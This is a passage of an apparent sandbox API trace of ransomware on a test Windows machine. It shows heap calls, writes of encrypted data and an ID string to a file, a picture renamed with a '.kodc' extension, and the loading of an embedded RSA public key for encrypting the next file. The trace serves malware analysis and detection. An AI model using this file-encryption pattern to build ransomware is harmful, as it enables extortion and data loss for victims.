Ptr=0x9b9f078, Size=0x218) returned 0x9bb7748 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655be8 | out: hHeap=0x630000) returned 1 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6868a0 | out: hHeap=0x630000) returned 1 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x6868a0 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x655be8 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x655c00 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655be8 | out: hHeap=0x630000) returned 1 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655c00 | out: hHeap=0x630000) returned 1 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6868a0 | out: hHeap=0x630000) returned 1 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7748 | out: hHeap=0x630000) returned 1 [0099.631] GetCurrentThreadId () returned 0x42c [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba58e8 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.632] GetCurrentThreadId () returned 0x42c [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x6868a0 [0099.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655c00 [0099.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7980 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7998 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79b0 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79b0 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79b0 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7998 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655c00 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655c00 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6868a0 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0099.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79b0 | out: hHeap=0x630000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x9bb7748 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655c00 | out: hHeap=0x630000) returned 1 [0099.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7748 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7980 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655be8 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9bd10 | out: hHeap=0x630000) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.635] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0x109ac, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x109ac, lpOverlapped=0x0) returned 1 [0099.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.635] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x109b1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.636] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.636] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.636] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.636] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.636] CloseHandle (hObject=0x5cc) returned 1 [0099.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0099.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0099.638] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iJKK_.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ijkk_.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iJKK_.gif.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ijkk_.gif.kodc")) returned 1 [0099.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.638] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.640] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x832a98d0, ftCreationTime.dwHighDateTime=0x1d5be6c, ftLastAccessTime.dwLowDateTime=0x19feb1a0, ftLastAccessTime.dwHighDateTime=0x1d5bca7, ftLastWriteTime.dwLowDateTime=0x19feb1a0, ftLastWriteTime.dwHighDateTime=0x1d5bca7, nFileSizeHigh=0x0, nFileSizeLow=0x70af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lrp6Blp6FKC5uB.png", cAlternateFileName="LRP6BL~1.PNG")) returned 1 [0099.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.640] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lrp6Blp6FKC5uB.png") returned=".png" [0099.640] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lrp6Blp6FKC5uB.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lrp6blp6fkc5ub.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.640] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=28847) returned 1 [0099.640] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.643] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7089, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.643] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.644] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.644] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.644] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x70af, lpOverlapped=0x0) returned 1 [0099.645] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.645] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.645] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.645] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0099.646] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.646] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.646] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.646] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.647] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.647] GetLastError () returned 0x0 [0099.647] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.647] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0099.647] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.647] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.647] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.647] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.647] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70b0) returned 0x9ba6d90 [0099.648] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.648] RtlAllocateHeap (HeapHandle=0x630000, 